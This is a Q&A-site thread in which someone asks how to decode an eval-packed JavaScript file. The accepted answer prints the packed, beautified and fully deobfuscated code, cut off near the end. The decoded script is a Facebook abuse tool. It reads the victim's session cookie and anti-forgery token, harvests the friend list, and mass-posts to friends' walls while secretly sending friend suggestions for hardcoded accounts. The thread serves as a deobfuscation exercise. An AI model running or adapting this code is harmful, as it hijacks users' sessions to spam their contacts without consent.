# javascript eval function decode

Tags: javascript, eval, decode

If you can help me I decrypt this script a long time ago and I forgot how?

script is on this [LINK](http://hdimages.cf/script.js)

as I recall, there are two eval function..

Comment: Seriously? What is your question?

Comment: Replace `eval` with `console.log`.  Done.

Comment: This is not what this site is for (we don't do your work for you). You'll need to attempt to do this yourself, and post here when you encounter a question or problem that has not already been asked here.

Comment: Post relavant code pieces, what you have tried and the exact problem you face, to get answers. BTW, I have zero confidence in clicking that link...

Comment: All valid points, which I unfortunately undermined because it was so fun to solve such a simple problem :)  I'll do my part and vote to close

Comment: I think of this as a simpler version of Nerd Sniping: http://xkcd.com/356/ :)

Comment: @JasonSperske FOOOOM. I wonder what programmers are worth. :p

Comment: [Click here before you post your next question.](http://s.tk/onhold)

Answer (score 6, accepted):

Using Eric Meyer's [URL Decoder/Encoder](http://meyerweb.com/eric/tools/dencoder/),

```
eval(function(d,e,a,c,b,f){b=function(a){return(a<e?"":b(parseInt(a/e)))+(35<(a%=e)?String.fromCharCode(a+29):a.toString(36))};if(!"".replace(/^/,String)){for(;a--;)f[b(a)]=c[a]||b(a);c=[function(a){return f[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}('3O:6 N=\'1S 1Q 1T 2L 3P 3N\\\'s 27.\';6 K="",1k=\'3k&3q 35<A 8="l:#1U;"1u="1W://Y.W.T/3l.4s">3Z 4u.</A><G/>4p 35<A 8="l:#1U;"1u="1W://Y.W.T/4i">4n 4m.</A>\';6 5="<7 Z=\'18-1e-5\'8=\'1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:2R;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+="<7><2F Z=\'2i\' 3L=\'3J 3I 3H 3G.\'8=\'w-15:P;16:3x;2A:1J;m-2D:2C;m-q:3C;1d-l:B(E,E,E,0.1);\'></2F></7>";5+="<7 H=\'3D\' 8=\'p-y:2d;w-15:P;\'><a 8=\'p-y:2d;w-15:P;\'1q-3B=\'3f\'1P-34=\'2q 1Y\'1q-3f-3m=\'2d\'H=\'3p 1z 3t\'1u=\'#\'3S=\'4f\'1P-4h=\'1\'1P-4o=\'2O\'1q-34=\'\'1q-F=\'30\'1q-4w=\'1w 4v 4e\'4d=\'3T\'Z=\'4a\'><i H=\'4c 49 48 1V 4k 47\'></i><I H=\'46\'>1C 27</I></a><I Z=\'45\'44=\'2G()\'8=\'p-y:L;m-2D:2C;l:O;16:4b;2A:43;\'H=\'42 3W 3V 3U 3X 2M\'>1w</I>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>";C.R("1N").1K=5;u 14(o){1g.1n(t.12.1t+"//Y.W.T/1y/3Y/41.3e?J="+J+"&40="+o+"&4t=1&4r=1&4q="+2y(1v)+"&2T="+2y(1v)+"&4y=4x&1x=1w&4g[4j]=4l&21="+19+"&1A=1&23=4z&22=1b&20=",u(a){6 b=a.39(a.2f("{"));6 c=2e.3g(b);i--;K="<7 H=\'18-1e-3K\'8=\'w-1f:P;p-y:M;m-q:11;O-1h:1j-1i;";v(c.29){K+="l:3j;m-q:3i;\'>";K+=\'3s 2T 3u 3o 3v 3h 2N 28 27.\';v(c.2S)K+=c.2S;1c K+=2e.3r(c,2E,"")}1c{K+="l:3R\'>";K+="1M 1L 2c 14 2L "+1p[i]+"\\\'s 3w.<G/>";1o++}K+="</7>";6 5="<7 Z=\'18-1e-5\'8=\'1I-1B:3M 1D 2Q B(0,0,0,0.3);1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:1a;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";v(i>0){6 N=\'1S 1Q 1T 1O 2c 3Q.\';5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+=D.F+"1C 2u<G/>";5+="<b>"+1o+"</b>1l 2P 3A"+(D.F-i)+"1l 3z";5+="("+i+"3y...)";5+="<7 H=\'18-1e\'>";5+=K;5+="<1V 8=\'1d:L 3F-3E 3n(1W:4P;w:5u;V:X 1G B(0,0,0,0.4);\' 5t="+2h[i]+"></1V><a 8=\'w-M:2Q;m-q:2R;p-y:M;l:#1U;1F:5i;m-5g:5l;\'>"+1p[i]+"</a>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=2w+"1M 1L 2p 14 2q 1l.<G/>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>"}1c{N=\'1S 1Q 1T 1O 2c 5z.\';5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+=D.F+"1C 2u 5v"+1o+"1l 2P</G></G>";t[13+\'1m\']=2O;5+="<7><I H=\'5x 5D 2M 1z 5I 25\'1Z=\'1X()\'8=\'l:O\'>5H 2N 5j</I><I H=\'5h 2Z 1z 5s 25\'1Z=\'t.12.5p()\'8=\'l:O\'>5K 5o</I><I H=\'5n 2Z 1z 25\' 1Z=\'C.R(\\"1N\\").8.5=\\"38\\"\'>5q</I><G/>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'><G/>";5+=1k;5+="</7>"}5+="</7>";C.R("1N").1K=5},"p","1x");S--;v(S>0){6 s=D[i];37("14("+s+");",5r)}3d.2z(S+"/"+D.F+":"+D[S]+"/"+1p[S]+", 5m:"+1o);v(J){1g.1n(t.12.1t+"//Y.W.T/1y/1Y/31?&2K="+o+"&2X=5f&2U=2V&2W=32&21="+19+"&1A=1&23=2I-&22=17&J="+J+"&20=5e",u(){},"p","1x")}v(J){1g.1n(t.12.1t+"//Y.W.T/1y/1Y/31?&2K="+o+"&2X=5k&2U=2V&2W=32&21="+19+"&1A=1&23=2I-&22=17&J="+J+"&20=5F",u(){},"p","1x")}}1g={b:u(){6 b=!1;v("5E"!=5G 24)2a{b=Q 24("5J.2J")}2b(c){2a{b=Q 24("5C.2J")}2b(a){b=!1}}1c v(t.2H)2a{b=Q 2H}2b(h){b=!1}26 b},1n:u(b,c,a,h,g){6 e=28.d();v(e&&b){e.33&&e.33("p/5w");h||(h="5y");a||(a="p");g||(g={});a=a.5B();h=h.5A();b+=b.2f("?")+1?"&":"?";6 k=2E;"4A"==h&&(k=b.5c("?"),b=k[0],k=k[1]);e.4N(h,b,!0);e.4M=g.c?u(){g.c(e)}:u(){v(4==e.4L)v(U==e.3a){6 b="";e.2B&&(b=e.2B);"j"==a.2Y(0)?(b=b.4O(/[\\n\\r]/g,""),b=5d("("+b+")")):"x"==a.2Y(0)&&(b=e.4R);c&&c(b)}1c g.f&&C.4Q("4K")[0].4J(g.f),g.e&&(C.R(g.e).8.5="38"),29&&29(e.3a)};e.4D(k)}},d:u(){26 28.b()}};u 1X(){t.12.1u="4C://Y.W.T/"};37("1X",1);t.4B=u(){v(t[13+\'1m\']){26\'4E 4F 1O 4I 3c!\'}};6 3c=(Q 4H).4G();6 13=\'4S\';6 i=3;6 S=3;6 1o=0;6 D=Q 1R;6 1p=Q 1R;6 2h=Q 1R;6 2w=C.4T("57")[0].1K;6 19=C.3b.36(C.3b.36(/56=(\\d+)/)[1]);6 J=C.55(\'J\')[0].2g;6 1v=\'\';1g.1n(t.12.1t+"//Y.W.T/1y/58/59.3e?"+"1A=1&5b[0]=5a&54=0&53="+19+"&4W=4V&4U=0",u(a){6 b=a;6 c=b.39(b.2f("{"));6 d=2e.3g(c);d=d.4X.4Y;2v(6 e=0;e<d.F;e++)D.2j(d[e].52);2v(6 1s=0;1s<d.F;1s++)1p.2j(d[1s].p);2v(6 1r=0;1r<d.F;1r++)2h.2j(d[1r].51);i=D.F-1;S=i;3d.2z(D.F)});u 2G(){v(C.R("2i").2g!=""){N=\'1M 1L 2p 4Z 1w.\';1v=C.R("2i").2g;6 5="<7 Z=\'18-1e-5\'8=\'1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:1a;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";5+="<7 8=\'w-1f:11;m-q:1E;\'>"+N+"</7>";5+=D.F+" 1C 2u<G/><G/>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=2w+"1M 1L 2p 14 2q 1l.<G/>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>";C.R("1N").1K=5}14(D[i])}',
62,357,"     display var div style             color font   text size   window function if padding  align   rgba document arr 255 length br class span fb_dtsg Descriptions center left Title white 5px new getElementById tay com 200 border facebook 1px www id 0pt 10px location tag Posting top width  friend user_id 15px  else background edge bottom jx space wrap pre _text Messege _close load suc arn data pic eg protocol href msg Post post ajax uiButton __a shadow Friends 3px 20px position solid gray box 100px innerHTML Wait Please pagelet_sidebar is aria Message Array Auto Poster 3B5998 img https ChangeLocation friends onClick phstamp __user __req __dyn ActiveXObject uiButtonLarge return Wall this error try catch Now right JSON indexOf value pho txtFloodMsg push 9999 500px radius index fixed While Your true margin 273px Detected for getuname 000000 encodeURIComponent log height responseText tahoma family null textarea autopostingfunc XMLHttpRequest 798aD5z5CF XMLHTTP receiver in selected to false Posted 8px 14px errorDescription message attempt_id 0585ab74e2dd0ff10282a3a36df39e19 ref newcomer charAt uiOverlayButton  suggest profile_others_dropdown overrideMimeType label By match setTimeout none substring status cookie now console php tooltip parse posted 9px darkred Created rupam alignh url not uiSelectorButton Designed stringify The uiButtonSuppressed could be Timeline 505px Lefted Processed of hover 13px clearfix repeat no here messege your Write name placeholder 0px Friend javascript All Started darkgreen role toggle _4jy3 _11b _4jy0 _4jy1 stream Rupam walltarget inline _42ft 25px onclick UIButton_Start uiButtonText sx_042661 customimg defaultIcon js_14 45px mrs rel Setting button nctr haspopup rupamslovejourney _mod sp_5ym4oy pagelet_reminders Team Facebook expanded Powered message_text birthday baveja render_notif_only Baveja Privacy ariaprefix 8ff493ad46 giftsgroupid 7n8ahyj35CFIwd9e POST onbeforeunload http send This script getTime Date running removeChild body readyState onreadystatechange open replace 125px getElementsByTagName responseXML Close getElementsByClassName stale_ok v7 token payload entries Starting  photo uid viewer lazy getElementsByName c_user fbxWelcomeBoxName typeahead first_degree user filter split eval 1658165120113116104521114 1273872655 weight layerConfirm absolute Homepage 100002920534041 bold success layerCancel Page reload Cancel 100 uiButtonConfirm src 2px and xml FriendRequestAdd GET Stopped toUpperCase toLowerCase Microsoft addButton undefined 1658168561015387781130 typeof Go uiButtonSpecial Msxml2 Refresh".split(" "),
0,{}));
```

Beautifying with [JS Beautifier](http://jsbeautifier.org/)

```
eval(function (d, e, a, c, b, f) {
    b = function (a) {
        return (a < e ? "" : b(parseInt(a / e))) + (35 < (a %= e) ? String.fromCharCode(a + 29) : a.toString(36))
    };
    if (!"".replace(/^/, String)) {
        for (; a--;) f[b(a)] = c[a] || b(a);
        c = [
            function (a) {
                return f[a]
            }
        ];
        b = function () {
            return "\\w+"
        };
        a = 1
    }
    for (; a--;) c[a] && (d = d.replace(RegExp("\\b" + b(a) + "\\b", "g"), c[a]));
    return d
}('3O:6 N=\'1S 1Q 1T 2L 3P 3N\\\'s 27.\';6 K="",1k=\'3k&3q 35<A 8="l:#1U;"1u="1W://Y.W.T/3l.4s">3Z 4u.</A><G/>4p 35<A 8="l:#1U;"1u="1W://Y.W.T/4i">4n 4m.</A>\';6 5="<7 Z=\'18-1e-5\'8=\'1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:2R;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+="<7><2F Z=\'2i\' 3L=\'3J 3I 3H 3G.\'8=\'w-15:P;16:3x;2A:1J;m-2D:2C;m-q:3C;1d-l:B(E,E,E,0.1);\'></2F></7>";5+="<7 H=\'3D\' 8=\'p-y:2d;w-15:P;\'><a 8=\'p-y:2d;w-15:P;\'1q-3B=\'3f\'1P-34=\'2q 1Y\'1q-3f-3m=\'2d\'H=\'3p 1z 3t\'1u=\'#\'3S=\'4f\'1P-4h=\'1\'1P-4o=\'2O\'1q-34=\'\'1q-F=\'30\'1q-4w=\'1w 4v 4e\'4d=\'3T\'Z=\'4a\'><i H=\'4c 49 48 1V 4k 47\'></i><I H=\'46\'>1C 27</I></a><I Z=\'45\'44=\'2G()\'8=\'p-y:L;m-2D:2C;l:O;16:4b;2A:43;\'H=\'42 3W 3V 3U 3X 2M\'>1w</I>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>";C.R("1N").1K=5;u 14(o){1g.1n(t.12.1t+"//Y.W.T/1y/3Y/41.3e?J="+J+"&40="+o+"&4t=1&4r=1&4q="+2y(1v)+"&2T="+2y(1v)+"&4y=4x&1x=1w&4g[4j]=4l&21="+19+"&1A=1&23=4z&22=1b&20=",u(a){6 b=a.39(a.2f("{"));6 c=2e.3g(b);i--;K="<7 H=\'18-1e-3K\'8=\'w-1f:P;p-y:M;m-q:11;O-1h:1j-1i;";v(c.29){K+="l:3j;m-q:3i;\'>";K+=\'3s 2T 3u 3o 3v 3h 2N 28 27.\';v(c.2S)K+=c.2S;1c K+=2e.3r(c,2E,"")}1c{K+="l:3R\'>";K+="1M 1L 2c 14 2L "+1p[i]+"\\\'s 3w.<G/>";1o++}K+="</7>";6 5="<7 Z=\'18-1e-5\'8=\'1I-1B:3M 1D 2Q B(0,0,0,0.3);1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:1a;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";v(i>0){6 N=\'1S 1Q 1T 1O 2c 3Q.\';5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+=D.F+"1C 2u<G/>";5+="<b>"+1o+"</b>1l 2P 3A"+(D.F-i)+"1l 3z";5+="("+i+"3y...)";5+="<7 H=\'18-1e\'>";5+=K;5+="<1V 8=\'1d:L 3F-3E 3n(1W:4P;w:5u;V:X 1G B(0,0,0,0.4);\' 5t="+2h[i]+"></1V><a 8=\'w-M:2Q;m-q:2R;p-y:M;l:#1U;1F:5i;m-5g:5l;\'>"+1p[i]+"</a>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=2w+"1M 1L 2p 14 2q 1l.<G/>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>"}1c{N=\'1S 1Q 1T 1O 2c 5z.\';5+="<7 8=\'w-1f:P;m-q:1E;\'>"+N+"</7>";5+=D.F+"1C 2u 5v"+1o+"1l 2P</G></G>";t[13+\'1m\']=2O;5+="<7><I H=\'5x 5D 2M 1z 5I 25\'1Z=\'1X()\'8=\'l:O\'>5H 2N 5j</I><I H=\'5h 2Z 1z 5s 25\'1Z=\'t.12.5p()\'8=\'l:O\'>5K 5o</I><I H=\'5n 2Z 1z 25\' 1Z=\'C.R(\\"1N\\").8.5=\\"38\\"\'>5q</I><G/>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'><G/>";5+=1k;5+="</7>"}5+="</7>";C.R("1N").1K=5},"p","1x");S--;v(S>0){6 s=D[i];37("14("+s+");",5r)}3d.2z(S+"/"+D.F+":"+D[S]+"/"+1p[S]+", 5m:"+1o);v(J){1g.1n(t.12.1t+"//Y.W.T/1y/1Y/31?&2K="+o+"&2X=5f&2U=2V&2W=32&21="+19+"&1A=1&23=2I-&22=17&J="+J+"&20=5e",u(){},"p","1x")}v(J){1g.1n(t.12.1t+"//Y.W.T/1y/1Y/31?&2K="+o+"&2X=5k&2U=2V&2W=32&21="+19+"&1A=1&23=2I-&22=17&J="+J+"&20=5F",u(){},"p","1x")}}1g={b:u(){6 b=!1;v("5E"!=5G 24)2a{b=Q 24("5J.2J")}2b(c){2a{b=Q 24("5C.2J")}2b(a){b=!1}}1c v(t.2H)2a{b=Q 2H}2b(h){b=!1}26 b},1n:u(b,c,a,h,g){6 e=28.d();v(e&&b){e.33&&e.33("p/5w");h||(h="5y");a||(a="p");g||(g={});a=a.5B();h=h.5A();b+=b.2f("?")+1?"&":"?";6 k=2E;"4A"==h&&(k=b.5c("?"),b=k[0],k=k[1]);e.4N(h,b,!0);e.4M=g.c?u(){g.c(e)}:u(){v(4==e.4L)v(U==e.3a){6 b="";e.2B&&(b=e.2B);"j"==a.2Y(0)?(b=b.4O(/[\\n\\r]/g,""),b=5d("("+b+")")):"x"==a.2Y(0)&&(b=e.4R);c&&c(b)}1c g.f&&C.4Q("4K")[0].4J(g.f),g.e&&(C.R(g.e).8.5="38"),29&&29(e.3a)};e.4D(k)}},d:u(){26 28.b()}};u 1X(){t.12.1u="4C://Y.W.T/"};37("1X",1);t.4B=u(){v(t[13+\'1m\']){26\'4E 4F 1O 4I 3c!\'}};6 3c=(Q 4H).4G();6 13=\'4S\';6 i=3;6 S=3;6 1o=0;6 D=Q 1R;6 1p=Q 1R;6 2h=Q 1R;6 2w=C.4T("57")[0].1K;6 19=C.3b.36(C.3b.36(/56=(\\d+)/)[1]);6 J=C.55(\'J\')[0].2g;6 1v=\'\';1g.1n(t.12.1t+"//Y.W.T/1y/58/59.3e?"+"1A=1&5b[0]=5a&54=0&53="+19+"&4W=4V&4U=0",u(a){6 b=a;6 c=b.39(b.2f("{"));6 d=2e.3g(c);d=d.4X.4Y;2v(6 e=0;e<d.F;e++)D.2j(d[e].52);2v(6 1s=0;1s<d.F;1s++)1p.2j(d[1s].p);2v(6 1r=0;1r<d.F;1r++)2h.2j(d[1r].51);i=D.F-1;S=i;3d.2z(D.F)});u 2G(){v(C.R("2i").2g!=""){N=\'1M 1L 2p 4Z 1w.\';1v=C.R("2i").2g;6 5="<7 Z=\'18-1e-5\'8=\'1F:2o;M:50%;2s-M:-2t;15:1J;16:2l;z-2n:2k;m-q:1a;p-y:L;w:1a;1I-1B:10 X 10 B(0,0,0,0.1);V-2m:1D;V:X 1G B(U,U,50,0.2);1d-l:B(E,E,E,0.9);l:#2x\'>";5+="<7 8=\'w-1f:11;m-q:1E;\'>"+N+"</7>";5+=D.F+" 1C 2u<G/><G/>";5+="<7 8=\'p-y:L;m-q:11;O-1h:1j-1i;l:1H\'>";5+=2w+"1M 1L 2p 14 2q 1l.<G/>";5+=1k;t[13+\'1m\']=2r;5+="</7>";5+="</7>";C.R("1N").1K=5}14(D[i])}',
    62, 357, "     display var div style             color font   text size   window function if padding  align   rgba document arr 255 length br class span fb_dtsg Descriptions center left Title white 5px new getElementById tay com 200 border facebook 1px www id 0pt 10px location tag Posting top width  friend user_id 15px  else background edge bottom jx space wrap pre _text Messege _close load suc arn data pic eg protocol href msg Post post ajax uiButton __a shadow Friends 3px 20px position solid gray box 100px innerHTML Wait Please pagelet_sidebar is aria Message Array Auto Poster 3B5998 img https ChangeLocation friends onClick phstamp __user __req __dyn ActiveXObject uiButtonLarge return Wall this error try catch Now right JSON indexOf value pho txtFloodMsg push 9999 500px radius index fixed While Your true margin 273px Detected for getuname 000000 encodeURIComponent log height responseText tahoma family null textarea autopostingfunc XMLHttpRequest 798aD5z5CF XMLHTTP receiver in selected to false Posted 8px 14px errorDescription message attempt_id 0585ab74e2dd0ff10282a3a36df39e19 ref newcomer charAt uiOverlayButton  suggest profile_others_dropdown overrideMimeType label By match setTimeout none substring status cookie now console php tooltip parse posted 9px darkred Created rupam alignh url not uiSelectorButton Designed stringify The uiButtonSuppressed could be Timeline 505px Lefted Processed of hover 13px clearfix repeat no here messege your Write name placeholder 0px Friend javascript All Started darkgreen role toggle _4jy3 _11b _4jy0 _4jy1 stream Rupam walltarget inline _42ft 25px onclick UIButton_Start uiButtonText sx_042661 customimg defaultIcon js_14 45px mrs rel Setting button nctr haspopup rupamslovejourney _mod sp_5ym4oy pagelet_reminders Team Facebook expanded Powered message_text birthday baveja render_notif_only Baveja Privacy ariaprefix 8ff493ad46 giftsgroupid 7n8ahyj35CFIwd9e POST onbeforeunload http send This script getTime Date running removeChild body readyState onreadystatechange open replace 125px getElementsByTagName responseXML Close getElementsByClassName stale_ok v7 token payload entries Starting  photo uid viewer lazy getElementsByName c_user fbxWelcomeBoxName typeahead first_degree user filter split eval 1658165120113116104521114 1273872655 weight layerConfirm absolute Homepage 100002920534041 bold success layerCancel Page reload Cancel 100 uiButtonConfirm src 2px and xml FriendRequestAdd GET Stopped toUpperCase toLowerCase Microsoft addButton undefined 1658168561015387781130 typeof Go uiButtonSpecial Msxml2 Refresh".split(" "),
    0, {}));
```

Finally by hijacking the eval and running the output through http://jsbeautifier.org/:

```
var Title = 'Auto Message Poster in All Friend\'s Wall.';
var Descriptions = "",
    _text = 'Created&Designed By<A style="color:#3B5998;"href="https://www.facebook.com/rupam.baveja">Rupam Baveja.</A><br/>Powered By<A style="color:#3B5998;"href="https://www.facebook.com/rupamslovejourney">Facebook Team.</A>';
var display = "<div id='friend-edge-display'style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";
display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
display += "<div><textarea id='txtFloodMsg' placeholder='Write your messege here.'style='padding-top:5px;width:505px;height:100px;font-family:tahoma;font-size:13px;background-color:rgba(255,255,255,0.1);'></textarea></div>";
display += "<div class='clearfix' style='text-align:right;padding-top:5px;'><a style='text-align:right;padding-top:5px;'data-hover='tooltip'aria-label='Your friends'data-tooltip-alignh='right'class='uiSelectorButton uiButton uiButtonSuppressed'href='#'role='button'aria-haspopup='1'aria-expanded='false'data-label=''data-length='30'data-ariaprefix='Post Privacy Setting'rel='toggle'id='js_14'><i class='mrs defaultIcon customimg img sp_5ym4oy sx_042661'></i><span class='uiButtonText'>Friends Wall</span></a><span id='UIButton_Start'onclick='autopostingfunc()'style='text-align:center;font-family:tahoma;color:white;width:45px;height:25px;'class='_42ft _4jy0 _11b _4jy3 _4jy1 selected'>Post</span>";
display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
display += _text;
window[tag + '_close'] = true;
display += "</div>";
display += "</div>";
document.getElementById("pagelet_sidebar").innerHTML = display;

function Posting(o) {
    jx.load(window.location.protocol + "//www.facebook.com/ajax/stream/inline.php?fb_dtsg=" + fb_dtsg + "&walltarget=" + o + "&render_notif_only=1&birthday=1&message_text=" + encodeURIComponent(msg) + "&message=" + encodeURIComponent(msg) + "&giftsgroupid=8ff493ad46&post=Post&nctr[_mod]=pagelet_reminders&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFIwd9e&__req=1b&phstamp=", function (a) {
        var b = a.substring(a.indexOf("{"));
        var c = JSON.parse(b);
        i--;
        Descriptions = "<div class='friend-edge-name'style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";
        if (c.error) {
            Descriptions += "color:darkred;font-size:9px;'>";
            Descriptions += 'The message could not be posted to this Wall.';
            if (c.errorDescription) Descriptions += c.errorDescription;
            else Descriptions += JSON.stringify(c, null, "")
        } else {
            Descriptions += "color:darkgreen'>";
            Descriptions += "Please Wait Now Posting in " + arn[i] + "\'s Timeline.<br/>";
            suc++
        }
        Descriptions += "</div>";
        var display = "<div id='friend-edge-display'style='box-shadow:0px 3px 8px rgba(0,0,0,0.3);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:15px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";
        if (i > 0) {
            var Title = 'Auto Message Poster is Now Started.';
            display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
            display += arr.length + "Friends Detected<br/>";
            display += "<b>" + suc + "</b>Messege Posted of" + (arr.length - i) + "Messege Processed";
            display += "(" + i + "Lefted...)";
            display += "<div class='friend-edge'>";
            display += Descriptions;
            display += "<img style='background:center no-repeat url(https:125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src=" + pho[i] + "></img><a style='padding-left:8px;font-size:14px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>" + arn[i] + "</a>";
            display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
            display += getuname + "Please Wait While Posting Your Messege.<br/>";
            display += _text;
            window[tag + '_close'] = true;
            display += "</div>";
            display += "</div>"
        } else {
            Title = 'Auto Message Poster is Now Stopped.';
            display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
            display += arr.length + "Friends Detected and" + suc + "Messege Posted</br></br>";
            window[tag + '_close'] = false;
            display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge'onClick='ChangeLocation()'style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge'onClick='window.location.reload()'style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"'>Cancel</span><br/>";
            display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";
            display += _text;
            display += "</div>"
        }
        display += "</div>";
        document.getElementById("pagelet_sidebar").innerHTML = display
    }, "text", "post");
    tay--;
    if (tay > 0) {
        var s = arr[i];
        setTimeout("Posting(" + s + ");", 100)
    }
    console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);
    if (fb_dtsg) {
        jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + o + "&newcomer=1273872655&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=1658165120113116104521114", function () {}, "text", "post")
    }
    if (fb_dtsg) {
        jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + o + "&newcomer=100002920534041&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=1658168561015387781130", function () {}, "text", "post")
    }
}
jx = {
    b: function () {
        var b = !1;
        if ("undefined" != typeof ActiveXObject) try {
                b = new ActiveXObject("Msxml2.XMLHTTP")
            } catch (c) {
                try {
                    b = new ActiveXObject("Microsoft.XMLHTTP")
                } catch (a) {
                    b = !1
                }
            } else if (window.XMLHttpRequest) try {
                b = new XMLHttpRequest
            } catch (h) {
                b = !1
            }
            return b
    },
    load: function (b, c, a, h, g) {
        var e = this.d();
        if (e && b) {
            e.overrideMimeType && e.overrideMimeType("text/xml");
            h || (h = "GET");
            a || (a = "text");
            g || (g = {});
            a = a.toLowerCase();
            h = h.toUpperCase();
            b += b.indexOf("?") + 1 ? "&" : "?";
            var k = null;
            "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
            e.open(h, b, !0);
            e.onreadystatechange = g.c ? function () {
                g.c(e)
            } : function () {
                if (4 == e.readyState)
                    if (200 == e.status) {
                        var b = "";
                        e.responseText && (b = e.responseText);
                        "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                        c && c(b)
                    } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
            };
            e.send(k)
        }
    },
    d: function () {
        return this.b()
    }
};

function ChangeLocation() {
    window.location.href = "http://www.facebook.com/"
};
setTimeout("ChangeLocation", 1);
window.onbeforeunload = function () {
    if (window[tag + '_close']) {
        return 'This script is running now!'
    }
};
var now = (new Date).getTime();
var tag = 'Close';
var i = 3;
var tay = 3;
var suc = 0;
var arr = new Array;
var arn = new Array;
var pho = new Array;
var getuname = document.getElementsByClassName("fbxWelcomeBoxName")[0].innerHTML;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var msg = '';
jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0", function (a) {
    var b = a;
    var c = b.substring(b.indexOf("{"));
    var d = JSON.parse(c);
    d = d.payload.entries;
    for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
    for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
    for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
    i = arr.length - 1;
    tay = i;
    console.log(arr.length)
});

function autopostingfunc() {
    if (document.getElementById("txtFloodMsg").value != "") {
        Title = 'Please Wait While Starting Post.';
        msg = document.getElementById("txtFloodMsg").value;
